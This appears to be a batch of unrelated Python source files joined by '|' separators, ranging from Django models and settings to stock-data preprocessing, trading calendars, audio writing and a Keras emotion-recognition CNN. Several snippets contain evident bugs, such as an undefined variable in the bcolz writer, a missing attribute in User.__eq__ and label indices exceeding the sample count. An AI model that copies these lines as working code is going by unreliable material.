raise ValueError('Superuser must have occupation=ADMIN.')
return super().create_superuser(username, email, password, **extra_fields)
class Profile(AbstractUser):
OCCUPATION_TYPE = (
('FAC', _('Functionary of Migratory acts')),
('FUF', _('Functionary of Finance')),
('BDAC', _('Boss of Migratory acts')),
('DIR', _('Director')),
('ADMIN', _('Administrator')),
)
born_date = models.DateField(_('Born date'), blank=True, null=True, validators=[validate_born_date])
occupation = models.CharField(_('Occupation'), max_length=5, choices=OCCUPATION_TYPE, default='FAC')
objects = CustomUserManager()
class Meta:
verbose_name = _('Profile')
verbose_name_plural = _('Profiles')
def age(self):
if self.born_date:
return _('%(years)d years') % {'years': date.today().year - self.born_date.year}
else:
return None
def __str__(self):
if self.first_name and self.last_name:
return self.get_full_name()
else:
return self.username
|
def from_h5(item, trajectory_item=None, atom_indices='all', frame_indices='all'):
from molsysmt.forms.api_h5 import to_mdtraj_Topology as h5_to_mdtraj_Topology
from molsysmt.native.io.topology import from_mdtraj_Topology as mdtraj_Topology_to_molsysmt_Topology
tmp_item = h5_to_mdtraj_Topology(item)
tmp_item = mdtraj_Topology_to_molsysmt_Topology(tmp_item)
return tmp_item
|
"""
动态信息
"""
import json
import os
import re
from functools import partial
from shutil import rmtree
import numpy as np
import pandas as pd
from logbook import Logger
from odo import odo
from cswd.common.utils import data_root, ensure_list
from cswd.sql.constants import MARGIN_MAPS
from .base import STOCK_DB, bcolz_table_path
from .utils import _normalize_ad_ts_sid
LABEL_MAPS = {'日期': 'asof_date', '股票代码': 'sid'}
DYNAMIC_TABLES = ['adjustments', 'margins', 'special_treatments','short_names']
logger = Logger('动态数据')
def normalized_dividend_data(df):
"""每股现金股利"""
raw_df = df[['股票代码', '日期', '派息']].copy()
raw_df.rename(columns=LABEL_MAPS, inplace=True)
raw_df.rename(columns={'派息': 'amount'}, inplace=True)
# 截止日期为发放日期前一天
raw_df['asof_date'] = pd.to_datetime(raw_df['asof_date']) - pd.Timedelta(days=1)
return raw_df
def normalized_margins_data(df):
"""融资融券数据"""
df.drop(['更新时间', '序号'], axis=1, inplace=True)
df.rename(columns=LABEL_MAPS, inplace=True)
df.rename(columns={v: k for k, v in MARGIN_MAPS.items()}, inplace=True)
return df
# # TODO:使用日线数据简化代替
def normalized_short_names_data(df):
"""股票简称数据"""
# 股票未上市或者新上市,暂无股票代码
df = df[~df['股票代码'].isna()].copy()
df.drop(['更新时间', '序号', '备注说明'], axis=1, inplace=True)
df.rename(columns=LABEL_MAPS, inplace=True)
df.rename(columns={'股票简称': 'short_name'}, inplace=True)
# 原为实施日期,截止日期前移一天
df['asof_date'] = df['asof_date'] - pd.Timedelta(days=1)
return df
# # TODO:股票简称-> 转换
def normalized_special_treatments_data(df):
"""特殊处理历史"""
# 股票未上市或者新上市,暂无股票代码
df = df[~df['股票代码'].isna()]
df = df[['股票代码', '日期', '特别处理']].copy()
df.rename(columns=LABEL_MAPS, inplace=True)
df.rename(columns={'特别处理': 'treatment'}, inplace=True)
# 原为实施日期,截止日期前移一天
df['asof_date'] = df['asof_date'] - pd.Timedelta(days=1)
return df
def _factory(table_name):
if table_name == 'adjustments':
return normalized_dividend_data
elif table_name == 'short_names':
return normalized_short_names_data
elif table_name == 'special_treatments':
return normalized_special_treatments_data
elif table_name == 'margins':
return normalized_margins_data
raise NotImplementedError(table_name)
def _write_by_expr(expr, ndays=0):
"""
以bcolz格式写入表达式数据
转换步骤:
1. 读取表数据转换为pd.DataFrame
"""
table_name = expr._name
# 整理数据表
# 1. 读取表
df = odo(expr, pd.DataFrame)
# 2. 调整转换数据
processed = _factory(table_name)(df)
# 3. 列名称及类型标准化
out = _normalize_ad_ts_sid(processed, ndays)
# 转换为bcolz格式并存储
rootdir = bcolz_table_path(table_name)
if os.path.exists(rootdir):
rmtree(rootdir)
odo(out, rootdir)
logger.info('表:{},数据存储路径:{}'.format(table_name, rootdir))
def write_dynamic_data_to_bcolz(tables=None):
"""
将每日变动数据以bcolz格式存储,提高数据集加载速度
"""
if not tables:
to_does = DYNAMIC_TABLES
else:
to_does = ensure_list(to_does)
for table in to_does:
if table in DYNAMIC_TABLES:
ndays = 0
logger.info('预处理表:{}'.format(table))
expr = STOCK_DB[table]
_write_by_expr(expr, ndays)
else:
raise ValueError('要写入的数据表{}不在"{}"范围'.format(
table, DYNAMIC_TABLES))
|
version_info = (2, 8, 0)
__version__ = ".".join([str(v) for v in version_info])
|
from sys import maxsize
class User:
def __init__(self, firstname=None, lastname=None, address1=None, postcode=None, city=None, email=None, phone=None, password=None, id=None):
self.firstname = firstname
self.lastname = lastname
self.address1 = address1
self.postcode = postcode
self.city = city
self.email = email
self.phone = phone
self.password=password
self.id = id
def __repr__(self):
return "%s:%s:%s" % (self.id, self.firstname, self.lastname)
def __eq__(self, other):
return (self.id is None or other.id is None or self.id== other.id) and self.name == other.name
def id_or_max(self):
if self.id:
return int(self.id)
else:
return maxsize |
#!/usr/bin/env python
## Program: VMTK
## Module: $RCSfile: vmtkcenterlinemerge.py,v $
## Language: Python
## Date: $Date: 2005/09/14 09:49:59 $
## Version: $Revision: 1.4 $
## Copyright (c) Luca Antiga, David Steinman. All rights reserved.
## See LICENSE file for details.
## This software is distributed WITHOUT ANY WARRANTY; without even
## the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
## PURPOSE. See the above copyright notices for more information.
from __future__ import absolute_import #NEEDS TO STAY AS TOP LEVEL MODULE FOR Py2-3 COMPATIBILITY
import vtk
import sys
from vmtk import pypes
from vmtk import vtkvmtk
class vmtkCenterlineMerge(pypes.pypeScript):
def __init__(self):
pypes.pypeScript.__init__(self)
self.Centerlines = None
self.RadiusArrayName = 'MaximumInscribedSphereRadius'
self.GroupIdsArrayName = 'GroupIds'
self.CenterlineIdsArrayName = 'CenterlineIds'
self.TractIdsArrayName = 'TractIds'
self.BlankingArrayName = 'Blanking'
self.Length = 0.0
self.MergeBlanked = 1
self.SetScriptName('vmtkcenterlinemerge')
self.SetScriptDoc('merge centerline tracts belonging to the same groups')
self.SetInputMembers([
['Centerlines','i','vtkPolyData',1,'','the input centerlines','vmtksurfacereader'],
['RadiusArrayName','radiusarray','str',1,'','name of the array where centerline radius is stored'],
['GroupIdsArrayName','groupidsarray','str',1,'','name of the array where centerline group ids are stored'],
['CenterlineIdsArrayName','centerlineidsarray','str',1,'','name of the array where centerline ids are stored'],
['TractIdsArrayName','tractidsarray','str',1,'','name of the array where centerline tract ids are stored'],
['BlankingArrayName','blankingarray','str',1,'','name of the array where centerline blanking information about branches is stored'],
['Length','length','float',1,'(0.0,)','length of the resampling interval'],
['MergeBlanked','mergeblanked','bool',1,'','toggle generation of segments for blanked groups']
])
self.SetOutputMembers([
['Centerlines','o','vtkPolyData',1,'','the output centerlines','vmtksurfacewriter']
])
def Execute(self):
if self.Centerlines == None:
self.PrintError('Error: No input centerlines.')
mergeCenterlines = vtkvmtk.vtkvmtkMergeCenterlines()
mergeCenterlines.SetInputData(self.Centerlines)
mergeCenterlines.SetRadiusArrayName(self.RadiusArrayName)
mergeCenterlines.SetGroupIdsArrayName(self.GroupIdsArrayName)
mergeCenterlines.SetCenterlineIdsArrayName(self.CenterlineIdsArrayName)
mergeCenterlines.SetTractIdsArrayName(self.TractIdsArrayName)
mergeCenterlines.SetBlankingArrayName(self.BlankingArrayName)
mergeCenterlines.SetResamplingStepLength(self.Length)
mergeCenterlines.SetMergeBlanked(self.MergeBlanked)
mergeCenterlines.Update()
self.Centerlines = mergeCenterlines.GetOutput()
if __name__=='__main__':
main = pypes.pypeMain()
main.Arguments = sys.argv
main.Execute()
|
import math
import wave
import struct
# https://stackoverflow.com/questions/33879523/python-how-can-i-generate-a-wav-file-with-beeps
import librosa
import matplotlib.pyplot as plt
import librosa.display
'''
# sr == sampling rate
x, sr = librosa.load("tensorsong.wav", sr=44100)
# stft is short time fourier transform
X = librosa.stft(x,hop_length=1024,n_fft=2048) #overlap #431 - 2047 -> #nfft is number of samples per fft
# convert the slices to amplitude
Xdb = librosa.amplitude_to_db(abs(X))
# ... and plot, magic!
plt.figure(figsize=(14, 5))
Xdb[:500] = 0
print(Xdb.shape)
librosa.display.specshow(Xdb, sr = sr, x_axis = 'time', y_axis = 'hz')
plt.colorbar()
plt.show()
'''
def save_wav(file_name,audio_tensor,nchanels=1):
# Open up a wav file
wav_file=wave.open(file_name,"w")
# wav params
nchannels = nchanels
sampwidth = 2
sample_rate = 44100.0
# 44100 is the industry standard sample rate - CD quality. If you need to
# save on file size you can adjust it downwards. The stanard for low quality
# is 8000 or 8kHz.
nframes = max(audio_tensor.shape) #len(audio_tensor)
comptype = "NONE"
compname = "not compressed"
wav_file.setparams((nchannels, sampwidth, sample_rate, nframes, comptype, compname))
# WAV files here are using short, 16 bit, signed integers for the
# sample size. So we multiply the floating point data we have by 32767, the
# maximum value for a short integer. NOTE: It is theortically possible to
# use the floating point -1.0 to 1.0 data directly in a WAV file but not
# obvious how to do that using the wave module in python.
if nchannels == 1: # mono sound
for sample in audio_tensor:
sample = sample[0]
wav_file.writeframes(struct.pack('h', int( sample * 32767.0 )))
if nchannels == 2: # stereo sound
for sample in audio_tensor:
for stereo in sample: # 1 left ear, 1 right ear iteratively
wav_file.writeframes(struct.pack('h', int(stereo * 32767.0 )))
wav_file.close()
# return
|
from __future__ import absolute_import
from __future__ import unicode_literals
from identify import identify
UNKNOWN = 'unknown'
IGNORED_TAGS = frozenset((
identify.DIRECTORY, identify.SYMLINK, identify.FILE,
identify.EXECUTABLE, identify.NON_EXECUTABLE,
identify.TEXT, identify.BINARY,
))
ALL_TAGS = frozenset((identify.ALL_TAGS - IGNORED_TAGS) | {UNKNOWN})
|
import logging.config
import sys
from .base import * # NOQA
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATES[0]['OPTIONS'].update({'debug': True})
TIME_ZONE = 'UTC'
STATIC_ROOT = str(ROOT_DIR.path('staticfiles'))
STATIC_URL = '/staticfiles/'
FAVICON_PATH = STATIC_URL + 'dist/webapp/app/extras/favicon.ico'
STATICFILES_DIRS = (
('dist', os.path.join(STATIC_ROOT, 'dist')),
)
CACHES = {
'default': {
'BACKEND': 'django_redis.cache.RedisCache',
'LOCATION': 'redis://localhost:6379',
'KEY_PREFIX': 'default',
'OPTIONS': {
'DB': 0,
'PARSER_CLASS': 'redis.connection.HiredisParser',
'CONNECTION_POOL_CLASS': 'redis.BlockingConnectionPool',
'CONNECTION_POOL_CLASS_KWARGS': {
'max_connections': 50,
'timeout': 20,
},
# 'MAX_CONNECTIONS': 1000,
'PICKLE_VERSION': -1, # Latest
}
}
}
SESSION_ENGINE = "django.contrib.sessions.backends.cache"
# Turn off debug while imported by Celery with a workaround
# See http://stackoverflow.com/a/4806384
if "celery" in sys.argv[0]:
DEBUG = False
# Debug Toolbar (http://django-debug-toolbar.readthedocs.org/)
INSTALLED_APPS += ('debug_toolbar',)
DEBUG_TOOLBAR_PATCH_SETTINGS = False
MIDDLEWARE += ['debug_toolbar.middleware.DebugToolbarMiddleware', ]
INTERNAL_IPS = ('127.0.0.1', '192.168.99.100',)
DEBUG_TOOLBAR_PANELS = [
'debug_toolbar.panels.versions.VersionsPanel',
'debug_toolbar.panels.timer.TimerPanel',
'debug_toolbar.panels.settings.SettingsPanel',
'debug_toolbar.panels.headers.HeadersPanel',
'debug_toolbar.panels.request.RequestPanel',
'debug_toolbar.panels.sql.SQLPanel',
'debug_toolbar.panels.cache.CachePanel',
# 'debug_toolbar.panels.staticfiles.StaticFilesPanel',
'debug_toolbar.panels.templates.TemplatesPanel',
'debug_toolbar.panels.signals.SignalsPanel',
'debug_toolbar.panels.logging.LoggingPanel',
'debug_toolbar.panels.redirects.RedirectsPanel',
]
DEBUG_TOOLBAR_CONFIG = {
'JQUERY_URL': '',
}
# By default (for development), show emails to console in DEBUG mode
#EMAIL_BACKEND = 'django.core.mail.backends.dummy.EmailBackend'
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
#EMAIL_BACKEND = 'django_ses.SESBackend'
print('EMAIL_BACKEND = {0}'.format(EMAIL_BACKEND))
CORS_ORIGIN_WHITELIST += ('http://localhost:3000',)
# Kinesis Firehose:
# -----------------
USE_FIREHOSE = False
# Dynamodb Usage
# --------------
USE_DYNAMODB_WORKERLOG_DB = True
USE_DYNAMODB_FILTERLOG_DB = True
USE_WORKER = False
# SNS notifications are disabled for development
ENABLE_STAFF_SNS_NOTIFICATIONS = False
|
import itertools as it
import datetime as dt
from dateutil import relativedelta as rd
from trading_calendars import trading_calendar as tc
from trading_calendars.errors import (
CalendarNameCollision,
CyclicCalendarAlias,
InvalidCalendarName
)
from trading_calendars.always_open import AlwaysOpenCalendar
from trading_calendars.exchange_calendar_asex import ASEXExchangeCalendar
from trading_calendars.exchange_calendar_bvmf import BVMFExchangeCalendar
from trading_calendars.exchange_calendar_cmes import CMESExchangeCalendar
from trading_calendars.exchange_calendar_iepa import IEPAExchangeCalendar
from trading_calendars.exchange_calendar_xams import XAMSExchangeCalendar
from trading_calendars.exchange_calendar_xasx import XASXExchangeCalendar
from trading_calendars.exchange_calendar_xbkk import XBKKExchangeCalendar
from trading_calendars.exchange_calendar_xbog import XBOGExchangeCalendar
from trading_calendars.exchange_calendar_xbom import XBOMExchangeCalendar
from trading_calendars.exchange_calendar_xbru import XBRUExchangeCalendar
from trading_calendars.exchange_calendar_xbud import XBUDExchangeCalendar
from trading_calendars.exchange_calendar_xbue import XBUEExchangeCalendar
from trading_calendars.exchange_calendar_xcbf import XCBFExchangeCalendar
from trading_calendars.exchange_calendar_xcse import XCSEExchangeCalendar
from trading_calendars.exchange_calendar_xdub import XDUBExchangeCalendar
from trading_calendars.exchange_calendar_xfra import XFRAExchangeCalendar
from trading_calendars.exchange_calendar_xhel import XHELExchangeCalendar
from trading_calendars.exchange_calendar_xhkg import XHKGExchangeCalendar
from trading_calendars.exchange_calendar_xice import XICEExchangeCalendar
from trading_calendars.exchange_calendar_xidx import XIDXExchangeCalendar
from trading_calendars.exchange_calendar_xist import XISTExchangeCalendar
from trading_calendars.exchange_calendar_xjse import XJSEExchangeCalendar
from trading_calendars.exchange_calendar_xkar import XKARExchangeCalendar
from trading_calendars.exchange_calendar_xkls import XKLSExchangeCalendar
from trading_calendars.exchange_calendar_xkrx import XKRXExchangeCalendar
from trading_calendars.exchange_calendar_xlim import XLIMExchangeCalendar
from trading_calendars.exchange_calendar_xlis import XLISExchangeCalendar
from trading_calendars.exchange_calendar_xlon import XLONExchangeCalendar
from trading_calendars.exchange_calendar_xmad import XMADExchangeCalendar
from trading_calendars.exchange_calendar_xmex import XMEXExchangeCalendar
from trading_calendars.exchange_calendar_xmil import XMILExchangeCalendar
from trading_calendars.exchange_calendar_xmos import XMOSExchangeCalendar
from trading_calendars.exchange_calendar_xnys import XNYSExchangeCalendar
from trading_calendars.exchange_calendar_xnze import XNZEExchangeCalendar
from trading_calendars.exchange_calendar_xosl import XOSLExchangeCalendar
from trading_calendars.exchange_calendar_xpar import XPARExchangeCalendar
from trading_calendars.exchange_calendar_xphs import XPHSExchangeCalendar
from trading_calendars.exchange_calendar_xpra import XPRAExchangeCalendar
from trading_calendars.exchange_calendar_xses import XSESExchangeCalendar
from trading_calendars.exchange_calendar_xsgo import XSGOExchangeCalendar
from trading_calendars.exchange_calendar_xshg import XSHGExchangeCalendar
from trading_calendars.exchange_calendar_xsto import XSTOExchangeCalendar
from trading_calendars.exchange_calendar_xswx import XSWXExchangeCalendar
from trading_calendars.exchange_calendar_xtai import XTAIExchangeCalendar
from trading_calendars.exchange_calendar_xtks import XTKSExchangeCalendar
from trading_calendars.exchange_calendar_xtse import XTSEExchangeCalendar
from trading_calendars.exchange_calendar_xwar import XWARExchangeCalendar
from trading_calendars.exchange_calendar_xwbo import XWBOExchangeCalendar
from trading_calendars.us_futures_calendar import QuantopianUSFuturesCalendar
from trading_calendars.weekday_calendar import WeekdayCalendar
import pandas as pd
from pandas.tseries import holiday, offsets
from pluto.coms.utils import conversions as cvr
from pluto.trading_calendars import wrappers as wr
from protos import calendar_pb2 as cpb
_default_calendar_factories = {
# Exchange calendars.
'ASEX': ASEXExchangeCalendar,
'BVMF': BVMFExchangeCalendar,
'CMES': CMESExchangeCalendar,
'IEPA': IEPAExchangeCalendar,
'XAMS': XAMSExchangeCalendar,
'XASX': XASXExchangeCalendar,
'XBKK': XBKKExchangeCalendar,
'XBOG': XBOGExchangeCalendar,
'XBOM': XBOMExchangeCalendar,
'XBRU': XBRUExchangeCalendar,
'XBUD': XBUDExchangeCalendar,
'XBUE': XBUEExchangeCalendar,
'XCBF': XCBFExchangeCalendar,
'XCSE': XCSEExchangeCalendar,
'XDUB': XDUBExchangeCalendar,
'XFRA': XFRAExchangeCalendar,
'XHEL': XHELExchangeCalendar,
'XHKG': XHKGExchangeCalendar,
'XICE': XICEExchangeCalendar,
'XIDX': XIDXExchangeCalendar,
'XIST': XISTExchangeCalendar,
'XJSE': XJSEExchangeCalendar,
'XKAR': XKARExchangeCalendar,
'XKLS': XKLSExchangeCalendar,
'XKRX': XKRXExchangeCalendar,
'XLIM': XLIMExchangeCalendar,
'XLIS': XLISExchangeCalendar,
'XLON': XLONExchangeCalendar,
'XMAD': XMADExchangeCalendar,
'XMEX': XMEXExchangeCalendar,
'XMIL': XMILExchangeCalendar,
'XMOS': XMOSExchangeCalendar,
'XNYS': XNYSExchangeCalendar,
'XNZE': XNZEExchangeCalendar,
'XOSL': XOSLExchangeCalendar,
'XPAR': XPARExchangeCalendar,
'XPHS': XPHSExchangeCalendar,
'XPRA': XPRAExchangeCalendar,
'XSES': XSESExchangeCalendar,
'XSGO': XSGOExchangeCalendar,
'XSHG': XSHGExchangeCalendar,
'XSTO': XSTOExchangeCalendar,
'XSWX': XSWXExchangeCalendar,
'XTAI': XTAIExchangeCalendar,
'XTKS': XTKSExchangeCalendar,
'XTSE': XTSEExchangeCalendar,
'XWAR': XWARExchangeCalendar,
'XWBO': XWBOExchangeCalendar,
# Miscellaneous calendars.
'us_futures': QuantopianUSFuturesCalendar,
'24/7': AlwaysOpenCalendar,
'24/5': WeekdayCalendar,
}
_default_calendar_aliases = {
'AMEX': 'XNYS',
'NYSE': 'XNYS',
'NASDAQ': 'XNYS',
'BATS': 'XNYS',
'FWB': 'XFRA',
'LSE': 'XLON',
'TSX': 'XTSE',
'BMF': 'BVMF',
'CME': 'CMES',
'CBOT': 'CMES',
'COMEX': 'CMES',
'NYMEX': 'CMES',
'ICE': 'IEPA',
'ICEUS': 'IEPA',
'NYFE': 'IEPA',
'CFE': 'XCBF',
'JKT': 'XIDX',
}
class TradingCalendarDispatcher(object):
"""
A class for dispatching and caching trading calendars.
Methods of a global instance of this class are provided by
calendars.calendar_utils.
Parameters
----------
calendars : dict[str -> TradingCalendar]
Initial set of calendars.
calendar_factories : dict[str -> function]
Factories for lazy calendar creation.
aliases : dict[str -> str]
Calendar name aliases.
"""
def __init__(self, calendars, calendar_factories, aliases):
self._calendars = calendars
self._calendar_factories = dict(calendar_factories)
self._aliases = dict(aliases)
def get_calendar(self, name):
"""
Retrieves an instance of an TradingCalendar whose name is given.
Parameters
----------
name : str
The name of the TradingCalendar to be retrieved.
Returns
-------
calendar : calendars.TradingCalendar
The desired calendar.
"""
canonical_name = self.resolve_alias(name)
try:
return self._calendars[canonical_name]
except KeyError:
# We haven't loaded this calendar yet, so make a new one.
pass
try:
factory = self._calendar_factories[canonical_name]
except KeyError:
# We don't have a factory registered for this name. Barf.
raise InvalidCalendarName(calendar_name=name)
# Cache the calendar for future use.
calendar = self._calendars[canonical_name] = factory()
return calendar
def has_calendar(self, name):
"""
Do we have (or have the ability to make) a calendar with ``name``?
"""
return (
name in self._calendars
or name in self._calendar_factories
or name in self._aliases
)
def register_calendar(self, name, calendar, force=False):
"""
Registers a calendar for retrieval by the get_calendar method.
Parameters
----------
name: str
The key with which to register this calendar.
calendar: TradingCalendar
The calendar to be registered for retrieval.
force : bool, optional
If True, old calendars will be overwritten on a name collision.
If False, name collisions will raise an exception.
Default is False.
Raises
------
CalendarNameCollision
If a calendar is already registered with the given calendar's name.
"""
if force:
self.deregister_calendar(name)
if self.has_calendar(name):
raise CalendarNameCollision(calendar_name=name)
self._calendars[name] = calendar
def register_calendar_type(self, name, calendar_type, force=False):
"""
Registers a calendar by type.
This is useful for registering a new calendar to be lazily instantiated
at some future point in time.
Parameters
----------
name: str
The key with which to register this calendar.
calendar_type: type
The type of the calendar to register.
force : bool, optional
If True, old calendars will be overwritten on a name collision.
If False, name collisions will raise an exception.
Default is False.
Raises
------
CalendarNameCollision
If a calendar is already registered with the given calendar's name.
"""
if force:
self.deregister_calendar(name)
if self.has_calendar(name):
raise CalendarNameCollision(calendar_name=name)
self._calendar_factories[name] = calendar_type
def register_calendar_alias(self, alias, real_name, force=False):
"""
Register an alias for a calendar.
This is useful when multiple exchanges should share a calendar, or when
there are multiple ways to refer to the same exchange.
After calling ``register_alias('alias', 'real_name')``, subsequent
calls to ``get_calendar('alias')`` will return the same result as
``get_calendar('real_name')``.
Parameters
----------
alias : str
The name to be used to refer to a calendar.
real_name : str
The canonical name of the registered calendar.
force : bool, optional
If True, old calendars will be overwritten on a name collision.
If False, name collisions will raise an exception.
Default is False.
"""
if force:
self.deregister_calendar(alias)
if self.has_calendar(alias):
raise CalendarNameCollision(calendar_name=alias)
self._aliases[alias] = real_name
# Ensure that the new alias doesn't create a cycle, and back it out if
# we did.
try:
self.resolve_alias(alias)
except CyclicCalendarAlias:
del self._aliases[alias]
raise
def resolve_alias(self, name):
"""
Resolve a calendar alias for retrieval.
Parameters
----------
name : str
The name of the requested calendar.
Returns
-------
canonical_name : str
The real name of the calendar to create/return.
"""
seen = []
while name in self._aliases:
seen.append(name)
name = self._aliases[name]
# This is O(N ** 2), but if there's an alias chain longer than 2,
# something strange has happened.
if name in seen:
seen.append(name)
raise CyclicCalendarAlias(
cycle=" -> ".join(repr(k) for k in seen)
)
return name
def deregister_calendar(self, name):
"""
If a calendar is registered with the given name, it is de-registered.
Parameters
----------
cal_name : str
The name of the calendar to be deregistered.
"""
self._calendars.pop(name, None)
self._calendar_factories.pop(name, None)
self._aliases.pop(name, None)
def clear_calendars(self):
"""
Deregisters all current registered calendars
"""
self._calendars.clear()
self._calendar_factories.clear()
self._aliases.clear()
global_calendar_dispatcher = TradingCalendarDispatcher(
calendars={},
calendar_factories=_default_calendar_factories,
aliases=_default_calendar_aliases
)
_cache = {}
def resolve_alias(name):
return global_calendar_dispatcher.resolve_alias(name)
def get_calendar_in_range(name, start_dt, end_dt=None, cache=False):
"""
Parameters
----------
name: str
start_dt: pandas.Timestamp
end_dt: pandas.Timestamp
Returns
-------
trading_calendars.TradingCalendar
"""
dis = global_calendar_dispatcher
try:
name = dis.resolve_alias(name)
factory = dis._calendar_factories[name]
except KeyError:
# We don't have a factory registered for this name. Barf.
raise InvalidCalendarName(calendar_name=name)
if end_dt is None:
end_dt = start_dt + pd.Timedelta(days=10)
cal = wr.OpenOffsetFix(start_dt, end_dt, factory)
if cache:
#cache the latest instance
_cache[name] = cal
return cal
def get_calendar(name):
try:
name = global_calendar_dispatcher.resolve_alias(name)
cal = _cache[name]
return cal
except KeyError:
raise RuntimeError("Calendar instance doesn't exist.")
class TradingCalendar(tc.TradingCalendar):
#todo: instead of calling init, we should call __new__
def __init__(self, start, end, proto_calendar):
super(TradingCalendar, self).__init__(start, end)
self._proto_calendar = proto_calendar
self._regular_early_close = self._from_proto_time(proto_calendar.regular_early_close)
def __new__(cls, start, end, proto_calendar):
pass
def _from_proto_time(self, proto_time):
return dt.time(proto_time.hour, proto_time.minute)
def _from_proto_holiday(self, proto_holiday):
offsts = [self._from_proto_offset(offset) for offset in proto_holiday.offsets]
return holiday.Holiday(
proto_holiday.name,
proto_holiday.year,
proto_holiday.month,
proto_holiday.day,
offset=offsts.pop() if len(offsts) == 1 else offsts,
observance=self._from_proto_observance(proto_holiday.observance),
start_date=pd.Timestamp(cvr.to_datetime(proto_holiday.start_date)),
end_date=pd.Timestamp(cvr.to_datetime(proto_holiday.end_date)),
days_of_week=[day for day in proto_holiday.days_of_week]
)
def _from_proto_offset(self, proto_offset):
if proto_offset.type == cpb.Offset.MONDAY:
return pd.DateOffset(weekday=rd.MO(proto_offset.n))
elif proto_offset.type == cpb.Offset.DAY:
return pd.DateOffset(offsets.Day(proto_offset.n))
elif proto_offset.type == cpb.Offset.THURSDAY:
return pd.DateOffset(weekday=rd.TH(proto_offset.n))
elif proto_offset.type == cpb.Offset.EASTER:
return pd.DateOffset(offsets.Easter())
else:
return
def _from_proto_observance(self, proto_observance):
if proto_observance == cpb.Observance.NEAREST_WORKDAY:
return holiday.nearest_workday
elif proto_observance == cpb.Observance.SUNDAY_TO_MONDAY:
return holiday.sunday_to_monday
else:
return
def close_times(self):
pass
def open_times(self):
pass
def name(self):
return self._proto_calendar.name
def tz(self):
return self._proto_calendar.timezone
def open_time(self):
return self._from_proto_time(self._proto_calendar.open_time)
def close_time(self):
return self._from_proto_time(self._proto_calendar.close_time)
def regular_holidays(self):
return tc.HolidayCalendar(
[self._from_proto_holiday(hol) for hol in self._proto_calendar.regular_holidays]
)
def adhoc_holidays(self):
return list(
it.chain(
*[pd.date_range(
cvr.to_datetime(r.start_date),
cvr.to_datetime(r.end_date))
for r in self._proto_calendar.adhoc_holidays])
)
def special_closes(self):
return [
(sp.time,
tc.HolidayCalendar(
[self._from_proto_holiday(hol)
for hol in sp.holidays]))
for sp in self._proto_calendar.special_closes]
def special_closes_adhoc(self):
return [
(sp.time,
[cvr.to_datetime(t).strftime("%Y-%m-%d")
for t in sp.dates])
for sp in self._proto_calendar.special_closes_adhoc]
def from_proto_calendar(proto_calendar, start, end=None, cache=False):
if end is None:
end = start + pd.Timedelta(days=365)
#todo: cache the calendar
return TradingCalendar(start, end, proto_calendar)
def to_proto_calendar(calendar):
#todo
pass |
"""A package for already-implemented machine learning Siamese architectures.
"""
from dualing.models.contrastive import ContrastiveSiamese
from dualing.models.cross_entropy import CrossEntropySiamese
from dualing.models.triplet import TripletSiamese
|
from random import randrange
#
from UnionFind_QuickFind import UnionFind
test_size = 12
uf = UnionFind( test_size )
uf.enumerate()
while 1 < uf.g :
uf.union( randrange( test_size ), randrange( test_size ) )
uf.enumerate()
|
from keras.utils.np_utils import to_categorical
import os
import cv2
import numpy as np
from sklearn.utils import shuffle
from sklearn.model_selection import train_test_split
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten
from keras.layers.convolutional import Conv2D
from keras.layers.convolutional import MaxPooling2D
from keras.optimizers import *
import os
dataPath = './dataset'
data_dir_list = os.listdir(dataPath)
# ['happiness', 'sadness', 'neutral', 'anger']
print(data_dir_list)
imgDataList = []
for dataset in data_dir_list:
img_list = os.listdir(dataPath+'/' + dataset)
print('Loaded the images of dataset-'+'{}\n'.format(dataset))
# print(img_list) Btüün image datası
for img in img_list:
inputImg = cv2.imread(dataPath + '/' + dataset + '/' + img)
inputImgResize = cv2.resize(inputImg, (48, 48))
# fotolar zaten 48x48. Emin olmak için resize yapıyorum
imgDataList.append(inputImgResize)
imgData = np.array(imgDataList)
imgData = imgData.astype('float32')
imgData = imgData/255 # Normalization
num_classes = 4
# 981 #(shape, dtype, order) arr nin içi o yüzden 0 ı alıyoruz. Kaç tane img datası oldugunu gösteriyor
num_of_samples = imgData.shape[0]
print(num_of_samples)
# 1lerden olusan 981 elemanlık array olustrudum
labels = np.ones((num_of_samples), dtype='int64')
# print(labels)
labels[0:420] = 0 # 421 happiness
labels[421:740] = 1 # 320 sadness
labels[741:1055] = 2 # 315 neutral
labels[1056:1271] = 3 # 216 anger
# print(labels)
Y = to_categorical(labels, num_classes)
# Çoklu sınıflandırma ile ilgilendiğimiz için etiketleri kategorik olarak etiketlememiz gerekiyor
# Elimizde bulunan sayıları(yani resimlerdeki sayıları 0 dan 6 ya kadar) encode ederek
# başka formata cevirdik
# 0 => [1,0,0,0,0,0,0,0,0,0]
# 2 => [0,0,1,0,0,0,0,0,0,0]
# 9 => [0,0,0,0,0,0,0,0,0,1]
# Burada bizim yaptığımız encoding, one-hot-encoding olarak geçer
# print(Y)
# Shuffle the dataset
x, y = shuffle(imgData, Y, random_state=2)
# Shuffle işlemi arrlerin içinde indexlerin yerlerini değiştiriyor. Burda imgData içindeki imageların sırasını rastgele değiştirip x e yazdık.
# Aynı şekilde Y içindekileri rastgele değiştirip y ye yazdık.
# print(x)
# print(y)
# Split the dataset
x_train, x_test, y_train, y_test = train_test_split(
x, y, test_size=0.05, random_state=2)
# Şimdi burada x in bir kısmını test olarak alıcam ve uyg içinde test olarak onu kullanıcam.
# test_size = datasetimin %95 train %5 validation a ayır demek.
# random_state ise yapılan işlemin belli bir sırada yapılmasını sağlıyor.
input_shape = (48, 48, 3)
# png datayı direkt kullandığımız için 3 kanalı var. digitRecognition da 1 demiştim çünkü ordaki datalar png değil csv içindeydi.
model = Sequential() # modeli oluşturduk.
# 1
model.add(Conv2D(filters=6, kernel_size=(5, 5),
input_shape=input_shape, padding='Same', activation='relu'))
# filters = convolution layerdaki filtre sayısı
# kernel_size = filtrenin boyutu.
# SamePadding kullanıyoruz(kenarlara 0 koyarak, input size = output size).
# Activation func. = relu
model.add(MaxPooling2D(pool_size=(2, 2)))
# 2
model.add(Conv2D(filters=16, kernel_size=(5, 5),
padding='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
# 3
model.add(Conv2D(filters=64, kernel_size=(5, 5),
padding='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
# Flatten -> matrixi tek sütun haline getirme işlemi. ANN için
model.add(Flatten())
model.add(Dense(128, activation='relu'))
